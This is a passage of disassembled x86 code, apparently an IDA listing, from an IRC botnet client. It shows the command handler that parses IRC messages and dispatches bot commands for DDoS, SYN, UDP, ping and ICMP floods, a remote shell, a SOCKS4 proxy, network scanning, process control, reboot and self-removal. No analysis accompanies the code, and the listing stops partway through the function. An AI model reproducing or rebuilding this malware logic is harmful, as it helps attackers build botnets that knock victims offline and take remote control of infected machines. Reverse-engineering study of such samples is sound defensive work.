loc_408F05: ; CODE XREF: sub_4089DC+515�j
xor eax, eax
jmp short loc_408F0E
; ---------------------------------------------------------------------------
loc_408F09: ; CODE XREF: sub_4089DC+511�j
; sub_4089DC+51F�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408F0E: ; CODE XREF: sub_4089DC+52B�j
test eax, eax
jz short loc_408F23
loc_408F12: ; CODE XREF: sub_4089DC+501�j
inc edi
add edx, 80h
cmp edi, 2
jl short loc_408EDA
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_408F23: ; CODE XREF: sub_4089DC+534�j
lea eax, [ebp+var_960]
push 21h
push eax
call sub_4158C0
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_408C5A
mov ecx, [ebp+arg_0]
lea edx, [ecx+1]
loc_408F43: ; CODE XREF: sub_4089DC+56C�j
mov al, [ecx]
inc ecx
test al, al
jnz short loc_408F43
sub ecx, edx
mov edx, ebx
lea esi, [edx+1]
loc_408F51: ; CODE XREF: sub_4089DC+57A�j
mov al, [edx]
inc edx
test al, al
jnz short loc_408F51
sub edx, esi
add edx, ecx
cmp edx, 7Eh
ja loc_408C5A
push ebx
push [ebp+arg_0]
shl edi, 7
add edi, [ebp+arg_18]
push offset aSS_3 ; ":%s%s"
push edi
call sub_414415
push 0
push 0
lea eax, [ebp+var_420]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4056BF
add esp, 24h
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_408F98: ; CODE XREF: sub_4089DC+3EE�j
mov edi, [ebp+var_A4]
mov ebx, offset aPart ; "PART"
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_408FC2
mov edi, [ebp+var_A4]
push 5
mov esi, offset aQuit ; "QUIT"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409012
loc_408FC2: ; CODE XREF: sub_4089DC+5D0�j
mov esi, [ebp+arg_18]
xor eax, eax
mov [ebp+var_10], esi
loc_408FCA: ; CODE XREF: sub_4089DC+634�j
cmp byte ptr [esi], 0
jz short loc_409000
mov edi, [ebp+var_A8]
loc_408FD5: ; CODE XREF: sub_4089DC+615�j
mov dl, [esi]
mov cl, dl
cmp dl, [edi]
jnz short loc_408FF7
test cl, cl
jz short loc_408FF3
mov dl, [esi+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_408FF7
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_408FD5
loc_408FF3: ; CODE XREF: sub_4089DC+603�j
xor ecx, ecx
jmp short loc_408FFC
; ---------------------------------------------------------------------------
loc_408FF7: ; CODE XREF: sub_4089DC+5FF�j
; sub_4089DC+60D�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_408FFC: ; CODE XREF: sub_4089DC+619�j
test ecx, ecx
jz short loc_409055
loc_409000: ; CODE XREF: sub_4089DC+5F1�j
mov esi, [ebp+var_10]
inc eax
add esi, 80h
cmp eax, 2
mov [ebp+var_10], esi
jl short loc_408FCA
loc_409012: ; CODE XREF: sub_4089DC+5E4�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset a353 ; "353"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_4090D6
mov esi, [ebp+var_98]
mov eax, [ebp+arg_8]
loc_409033: ; CODE XREF: sub_4089DC+673�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_4090B4
test cl, cl
jz short loc_409051
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_4090B4
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409033
loc_409051: ; CODE XREF: sub_4089DC+661�j
xor eax, eax
jmp short loc_4090B9
; ---------------------------------------------------------------------------
loc_409055: ; CODE XREF: sub_4089DC+622�j
mov ecx, [ebp+arg_18]
shl eax, 7
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax
call sub_414415
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
mov edi, [ebp+var_A4]
add esp, 10h
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jnz loc_408C5A
lea eax, [ebp+var_2F0]
push eax
mov eax, [ebp+var_A8]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_408BB3
; ---------------------------------------------------------------------------
loc_4090B4: ; CODE XREF: sub_4089DC+65D�j
; sub_4089DC+66B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4090B9: ; CODE XREF: sub_4089DC+677�j
test eax, eax
jnz short loc_4090C6
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_4090C6: ; CODE XREF: sub_4089DC+6DF�j
push [ebp+var_98]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_40E667
; ---------------------------------------------------------------------------
loc_4090D6: ; CODE XREF: sub_4089DC+648�j
mov edi, [ebp+var_A4]
mov eax, offset aPrivmsg ; "PRIVMSG"
push 8
xor edx, edx
mov esi, eax
pop ecx
repe cmpsb
mov edx, offset aNotice ; "NOTICE"
jz short loc_409126
mov edi, [ebp+var_A4]
push 7
mov esi, edx
pop ecx
xor ebx, ebx
repe cmpsb
jz short loc_409126
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427938
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40E4AE
cmp dword_42BEC8, ebx
jz loc_40E4AE
loc_409126: ; CODE XREF: sub_4089DC+713�j
; sub_4089DC+724�j
mov edi, [ebp+var_A4]
mov ebx, [ebp+var_20]
mov esi, eax
push 8
pop ecx
xor eax, eax
repe cmpsb
jz loc_409228
mov edi, [ebp+var_A4]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jz loc_409228
mov eax, [ebp+var_9C]
inc [ebp+var_98]
mov [ebp+var_20], 4
mov [ebp+var_A0], eax
loc_40916C: ; CODE XREF: sub_4089DC+90A�j
; sub_4089DC+949�j ...
mov ebx, [ebp+var_20]
shl ebx, 2
lea eax, [ebp+ebx+var_A8]
mov ecx, [eax]
lea edx, [ecx+1]
mov [eax], edx
mov al, byte_42BED0
cmp [ecx], al
mov [ebp+var_28], edx
jnz loc_408C5A
push 6
mov edi, edx
mov esi, offset aLogin ; "login"
pop ecx
xor eax, eax
repe cmpsb
jz loc_40E4B6
push 2
mov edi, edx
mov esi, offset dword_427934
pop ecx
xor eax, eax
repe cmpsb
jz loc_40E4B6
cmp [ebp+var_18], eax
jnz short loc_4091D5
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427938
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40E4AE
loc_4091D5: ; CODE XREF: sub_4089DC+7DF�j
xor eax, eax
cmp [ebp+arg_28], eax
jnz loc_40E4AE
cmp dword_42C308, eax
mov [ebp+var_10], eax
jle loc_4094E7
mov [ebp+var_18], offset dword_47B398
loc_4091F6: ; CODE XREF: sub_4089DC+994�j
mov edi, [ebp+var_18]
mov esi, edx
loc_4091FB: ; CODE XREF: sub_4089DC+843�j
mov cl, [edi]
mov al, cl
cmp cl, [esi]
jnz loc_409354
test al, al
jz short loc_409221
mov cl, [edi+1]
mov al, cl
cmp cl, [esi+1]
jnz loc_409354
inc edi
inc edi
inc esi
inc esi
test al, al
jnz short loc_4091FB
loc_409221: ; CODE XREF: sub_4089DC+82D�j
xor eax, eax
jmp loc_409359
; ---------------------------------------------------------------------------
loc_409228: ; CODE XREF: sub_4089DC+75C�j
; sub_4089DC+771�j
mov edi, [ebp+var_A4]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409240
mov [ebp+var_4], 1
loc_409240: ; CODE XREF: sub_4089DC+85B�j
cmp [ebp+var_A0], 0
jz loc_408C5A
push offset dword_427930
push [ebp+var_A0]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_409269
cmp [ebp+var_4], 0
jz short loc_409275
loc_409269: ; CODE XREF: sub_4089DC+885�j
lea eax, [ebp+var_F0]
mov [ebp+var_A0], eax
loc_409275: ; CODE XREF: sub_4089DC+88B�j
cmp [ebp+var_9C], 0
jz loc_408C5A
inc [ebp+var_9C]
jz short loc_4092C4
cmp [ebp+arg_10], 0
jz short loc_4092C4
lea eax, [ebp+var_3BC]
lea edx, [eax+1]
loc_409299: ; CODE XREF: sub_4089DC+8C2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409299
sub eax, edx
push eax
push [ebp+var_9C]
lea eax, [ebp+var_3BC]
push eax
call sub_415D10
add esp, 0Ch
mov ebx, eax
neg ebx
sbb ebx, ebx
add ebx, 4
mov [ebp+var_20], ebx
loc_4092C4: ; CODE XREF: sub_4089DC+8AC�j
; sub_4089DC+8B2�j
mov eax, ebx
shl eax, 2
mov edx, [ebp+eax+var_A8]
test edx, edx
jz loc_408C5A
push 0Ah
mov edi, edx
mov esi, offset dword_427924
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40916C
mov esi, [ebp+var_A0]
mov bl, [esi]
cmp bl, 23h
jz short loc_409317
mov ecx, dword_47BF28
mov ecx, off_42BFBC[ecx*4]
cmp byte ptr [ecx], 0
jz short loc_409317
push ecx
push esi
push offset dword_427908
jmp loc_408BB3
; ---------------------------------------------------------------------------
loc_409317: ; CODE XREF: sub_4089DC+91B�j
; sub_4089DC+92D�j
mov edi, edx
push 6
mov esi, offset dword_427900
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40916C
mov eax, [ebp+eax+var_A4]
test eax, eax
jz loc_40916C
cmp bl, 23h
jz loc_40916C
push eax
push [ebp+var_A0]
push offset dword_4278E8
jmp loc_408BB3
; ---------------------------------------------------------------------------
loc_409354: ; CODE XREF: sub_4089DC+825�j
; sub_4089DC+837�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409359: ; CODE XREF: sub_4089DC+847�j
test eax, eax
jz short loc_40937B
inc [ebp+var_10]
mov eax, [ebp+var_10]
add [ebp+var_18], 0B8h
cmp eax, dword_42C308
jl loc_4091F6
jmp loc_4094E7
; ---------------------------------------------------------------------------
loc_40937B: ; CODE XREF: sub_4089DC+97F�j
push offset asc_425A50 ; " :"
push [ebp+arg_0]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz loc_408C5A
mov esi, [ebp+var_10]
mov cl, byte_42BED0
imul esi, 0B8h
mov [eax+2], cl
mov cl, byte_42BED0
mov [eax+3], cl
push 9Fh
lea ecx, dword_47B3B0[esi]
push ecx
add eax, 4
push eax
call sub_4144A0
lea eax, dword_47B398[esi]
lea edi, [ebp+ebx+var_68]
add esp, 0Ch
mov [ebp+var_10], 0Fh
mov [ebp+var_18], eax
mov esi, edi
loc_4093DB: ; CODE XREF: sub_4089DC+AA3�j
push [ebp+var_10]
lea eax, [ebp+var_C8]
push offset aD_1 ; "$%d-"
push eax
call sub_414415
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_414EE0
add esp, 14h
test eax, eax
jz short loc_409444
cmp dword ptr [esi], 0
jz short loc_409449
mov eax, [ebp+var_18]
lea edx, [eax+1]
loc_409410: ; CODE XREF: sub_4089DC+A39�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409410
sub eax, edx
add [ebp+var_14], eax
jz short loc_409475
push dword ptr [esi-4]
push [ebp+var_14]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_409475
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_406650
add esp, 0Ch
jmp short loc_409475
; ---------------------------------------------------------------------------
loc_409444: ; CODE XREF: sub_4089DC+A27�j
cmp dword ptr [esi], 0
jnz short loc_409475
loc_409449: ; CODE XREF: sub_4089DC+A2C�j
push 2
lea eax, [ebp+var_C8]
push eax
lea eax, [ebp+var_24]
push eax
call sub_4144A0
and [ebp+var_22], 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_406650
add esp, 18h
loc_409475: ; CODE XREF: sub_4089DC+A40�j
; sub_4089DC+A51�j ...
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg loc_4093DB
mov [ebp+var_10], 10h
mov esi, edi
loc_40948E: ; CODE XREF: sub_4089DC+AFF�j
push [ebp+var_10]
lea eax, [ebp+var_C8]
push offset aD_0 ; "$%d"
push eax
call sub_414415
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_414EE0
add esp, 14h
test eax, eax
jz short loc_4094D1
mov eax, [esi]
test eax, eax
jz short loc_4094D1
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_406650
add esp, 0Ch
loc_4094D1: ; CODE XREF: sub_4089DC+ADA�j
; sub_4089DC+AE0�j
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg short loc_40948E
mov edx, [ebp+var_28]
mov [ebp+var_8], 1
loc_4094E7: ; CODE XREF: sub_4089DC+80D�j
; sub_4089DC+99A�j
mov al, byte_42BED0
cmp [edx], al
jz short loc_4094FA
cmp [ebp+var_8], 0
jz loc_4096D0
loc_4094FA: ; CODE XREF: sub_4089DC+B12�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_406650
lea eax, [ebp+var_F0]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_406650
push [ebp+var_A0]
push offset aChan ; "$chan"
push edi
call sub_406650
push 0
push 0
lea eax, [ebp+var_C8]
push 2
push eax
call sub_40FC7C
push eax
push offset aRndnick_0 ; "$rndnick"
push edi
call sub_406650
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_406650
mov esi, offset aChr ; "$chr("
push esi
push edi
call sub_414EE0
add esp, 14h
jmp loc_409654
; ---------------------------------------------------------------------------
loc_409571: ; CODE XREF: sub_4089DC+C7A�j
push esi
push [ebp+arg_0]
call sub_414EE0
mov [ebp+var_28], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_C8]
push eax
call sub_4144A0
lea eax, [ebp+var_C8]
push offset asc_4278A8 ; ")"
push eax
call sub_415289
add esp, 1Ch
cmp [ebp+var_C8], 30h
jl short loc_4095B5
cmp [ebp+var_C8], 39h
jle short loc_4095CB
loc_4095B5: ; CODE XREF: sub_4089DC+BCE�j
push 3
lea eax, [ebp+var_C8]
push offset a63 ; "63"
push eax
call sub_4144A0
add esp, 0Ch
loc_4095CB: ; CODE XREF: sub_4089DC+BD7�j
lea eax, [ebp+var_C8]
push eax
call sub_4147A2
test eax, eax
pop ecx
jle short loc_4095EE
lea eax, [ebp+var_C8]
push eax
call sub_4147A2
pop ecx
mov [ebp+var_24], al
jmp short loc_4095FF
; ---------------------------------------------------------------------------
loc_4095EE: ; CODE XREF: sub_4089DC+BFE�j
call sub_4145D1
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_24], dl
loc_4095FF: ; CODE XREF: sub_4089DC+C10�j
and [ebp+var_23], 0
lea eax, [ebp+var_C8]
lea edx, [eax+1]
loc_40960C: ; CODE XREF: sub_4089DC+C35�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40960C
sub eax, edx
mov ecx, eax
xor eax, eax
lea edi, [ebp+var_C8]
stosd
stosd
add ecx, 6
push ecx
push [ebp+var_28]
stosd
lea eax, [ebp+var_C8]
push eax
call sub_4144A0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_406650
push esi
push [ebp+arg_0]
call sub_414EE0
add esp, 20h
loc_409654: ; CODE XREF: sub_4089DC+B90�j
test eax, eax
jnz loc_409571
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1F70]
push eax
call sub_4144A0
push esi
lea eax, [ebp+var_1F70]
push eax
lea eax, [ebp+var_2270]
push eax
call sub_4144A0
mov esi, offset asc_420AE8 ; " "
lea eax, [ebp+var_2270]
push esi
push eax
call sub_415289
xor edi, edi
add esp, 20h
mov [ebp+var_A8], eax
inc edi
loc_4096A3: ; CODE XREF: sub_4089DC+CDC�j
push esi
push 0
call sub_415289
mov [ebp+edi*4+var_A8], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4096A3
lea eax, [ebp+ebx+var_A8]
mov ecx, [eax]
test ecx, ecx
jz loc_408C5A
add ecx, 3
mov [eax], ecx
loc_4096D0: ; CODE XREF: sub_4089DC+B18�j
mov eax, [ebp+ebx+var_A8]
push 8
mov edi, eax
mov esi, offset aRndnick ; "rndnick"
pop ecx
xor edx, edx
repe cmpsb
mov [ebp+var_18], eax
jz loc_40E461
push 3
mov edi, eax
mov esi, offset aRn ; "rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E461
push 4
mov edi, eax
mov esi, offset aDie ; "die"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D9CA
push 2
mov edi, eax
mov esi, offset aD ; "d"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D9CA
push 7
mov edi, eax
mov esi, offset aLogout ; "logout"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D8DC
push 3
mov edi, eax
mov esi, offset aLo ; "lo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D8DC
push 8
mov edi, eax
mov esi, offset aVersion ; "version"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D8BE
push 4
mov edi, eax
mov esi, offset aVer ; "ver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D8BE
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D7BF
push 4
mov edi, eax
mov esi, offset aSec ; "sec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D7BF
push 9
mov edi, eax
mov esi, offset aUnsecure ; "unsecure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D7BF
push 6
mov edi, eax
mov esi, offset aUnsec ; "unsec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D7BF
push 7
mov edi, eax
mov esi, offset aSocks4 ; "socks4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D69A
push 3
mov edi, eax
mov esi, offset aS4 ; "s4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D69A
push 0Bh
mov edi, eax
mov esi, offset aSocks4stop ; "socks4stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40981A
push [ebp+ebx+var_A4]
push 12h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40981A: ; CODE XREF: sub_4089DC+E24�j
push 0Bh
mov edi, eax
mov esi, offset aRloginstop ; "rloginstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409842
push [ebp+ebx+var_A4]
push 7
push offset aServer_0 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_409842: ; CODE XREF: sub_4089DC+E4C�j
push 9
mov edi, eax
mov esi, offset aHttpstop ; "httpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40986A
push [ebp+ebx+var_A4]
push 4
push offset aServer_0 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40986A: ; CODE XREF: sub_4089DC+E74�j
push 8
mov edi, eax
mov esi, offset aLogstop ; "logstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409892
push [ebp+ebx+var_A4]
push 1Dh
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_409892: ; CODE XREF: sub_4089DC+E9C�j
push 0Dh
mov edi, eax
mov esi, offset aRedirectstop ; "redirectstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4098BA
push [ebp+ebx+var_A4]
push 11h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect_0 ; "[REDIRECT]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_4098BA: ; CODE XREF: sub_4089DC+EC4�j
push 0Ah
mov edi, eax
mov esi, offset aDdos_stop ; "ddos.stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4098E2
push [ebp+ebx+var_A4]
push 0Bh
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_4098E2: ; CODE XREF: sub_4089DC+EEC�j
push 8
mov edi, eax
mov esi, offset aSynstop ; "synstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40990A
push [ebp+ebx+var_A4]
push 0Ch
push offset aSynFlood ; "Syn flood"
push offset aSyn_0 ; "[SYN]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40990A: ; CODE XREF: sub_4089DC+F14�j
push 8
mov edi, eax
mov esi, offset aUdpstop ; "udpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409932
push [ebp+ebx+var_A4]
push 10h
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_409932: ; CODE XREF: sub_4089DC+F3C�j
push 9
mov edi, eax
mov esi, offset aPingstop ; "pingstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40995A
push [ebp+ebx+var_A4]
push 0Fh
push offset aPingFlood ; "Ping flood"
push offset aPing_1 ; "[PING]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_40995A: ; CODE XREF: sub_4089DC+F64�j
push 9
mov edi, eax
mov esi, offset aIcmpstop ; "icmpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409982
push [ebp+ebx+var_A4]
push 0Eh
push offset aIcmpFlood ; "ICMP flood"
push offset aIcmp_0 ; "[ICMP]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_409982: ; CODE XREF: sub_4089DC+F8C�j
push 9
mov edi, eax
mov esi, offset aTftpstop ; "tftpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4099AA
push [ebp+ebx+var_A4]
push 5
push offset aServer_0 ; "Server"
push offset aTftp_0 ; "[TFTP]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_4099AA: ; CODE XREF: sub_4089DC+FB4�j
push 0Dh
mov edi, eax
mov esi, offset aFindfilestop ; "findfilestop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D66B
push 7
mov edi, eax
mov esi, offset aFfstop ; "ffstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D66B
push 0Ah
mov edi, eax
mov esi, offset aProcsstop ; "procsstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D656
push 7
mov edi, eax
mov esi, offset aPsstop ; "psstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D656
push 0Ah
mov edi, eax
mov esi, offset aClonestop ; "clonestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409A22
push [ebp+ebx+var_A4]
push 18h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_409A22: ; CODE XREF: sub_4089DC+102C�j
push 0Bh
mov edi, eax
mov esi, offset aSecurestop ; "securestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409A4A
push [ebp+ebx+var_A4]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset aSecure_1 ; "[SECURE]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_409A4A: ; CODE XREF: sub_4089DC+1054�j
push 9
mov edi, eax
mov esi, offset aScanstop ; "scanstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409A72
push [ebp+ebx+var_A4]
push 9
push offset aScan_1 ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_409A72: ; CODE XREF: sub_4089DC+107C�j
push 0Ah
mov edi, eax
mov esi, offset aScanstats ; "scanstats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D63D
push 6
mov edi, eax
mov esi, offset aStats ; "stats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D63D
push 0Ah
mov edi, eax
mov esi, offset aReconnect ; "reconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D61C
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D61C
push 0Bh
mov edi, eax
mov esi, offset aDisconnect ; "disconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5FA
push 3
mov edi, eax
mov esi, offset aDc ; "dc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5FA
push 5
mov edi, eax
mov esi, offset aQuit_0 ; "quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5B0
push 2
mov edi, eax
mov esi, offset aQ ; "q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5B0
push 7
mov edi, eax
mov esi, offset aStatus ; "status"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D571
push 2
mov edi, eax
mov esi, offset aS_4 ; "s"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D571
push 3
mov edi, eax
mov esi, offset aId ; "id"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D539
push 2
mov edi, eax
mov esi, offset aI_0 ; "i"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D539
push 7
mov edi, eax
mov esi, offset aReboot ; "reboot"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409BB4
call sub_4069D5
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_409B85
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_409B85: ; CODE XREF: sub_4089DC+11A2�j
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_414415
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 1Ch
jmp loc_40D9C2
; ---------------------------------------------------------------------------
loc_409BB4: ; CODE XREF: sub_4089DC+1194�j
push 8
mov edi, eax
mov esi, offset aThreads ; "threads"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D44A
push 2
mov edi, eax
mov esi, offset aT ; "t"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D44A
push 8
mov edi, eax
mov esi, offset aAliases ; "aliases"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D427
push 3
mov edi, eax
mov esi, offset aAl ; "al"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D427
push 4
mov edi, eax
mov esi, offset aLog_0 ; "log"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D334
push 3
mov edi, eax
mov esi, offset aLg ; "lg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D334
push 9
mov edi, eax
mov esi, offset aClearlog ; "clearlog"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D318
push 4
mov edi, eax
mov esi, offset aClg ; "clg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D318
push 8
mov edi, eax
mov esi, offset aNetinfo ; "netinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2DD
push 3
mov edi, eax
mov esi, offset aNi ; "ni"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2DD
push 8
mov edi, eax
mov esi, offset aSysinfo ; "sysinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2B1
push 3
mov edi, eax
mov esi, offset aSi ; "si"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2B1
push 8
mov edi, eax
mov esi, offset aDestroy ; "destroy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D234
push 0Bh
mov edi, eax
mov esi, offset aErradicate ; "erradicate"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D234
push 6
mov edi, eax
mov esi, offset aProcs ; "procs"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D10E
push 3
mov edi, eax
mov esi, offset aPs ; "ps"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D10E
push 7
mov edi, eax
mov esi, offset aUptime ; "uptime"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D087
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D087
push 0Ah
mov edi, eax
mov esi, offset aDriveinfo ; "driveinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D06A
push 4
mov edi, eax
mov esi, offset aDrv ; "drv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D06A
push 9
mov edi, eax
mov esi, offset aTestdlls ; "testdlls"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D051
push 4
mov edi, eax
mov esi, offset aDll ; "dll"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D051
push 8
mov edi, eax
mov esi, offset aOpencmd ; "opencmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D012
push 5
mov edi, eax
mov esi, offset aOcmd ; "ocmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D012
push 8
mov edi, eax
mov esi, offset aCmdstop ; "cmdstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409DBC
push [ebp+ebx+var_A4]
push 8
push offset aRemoteShell ; "Remote shell"
push offset aCmd_0 ; "[CMD]"
jmp loc_40D67E
; ---------------------------------------------------------------------------
loc_409DBC: ; CODE XREF: sub_4089DC+13C6�j
push 4
mov edi, eax
mov esi, offset aWho ; "who"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40A0FB
cmp [ebp+var_C], edx
jnz short loc_409DEF
push edx
push [ebp+var_4]
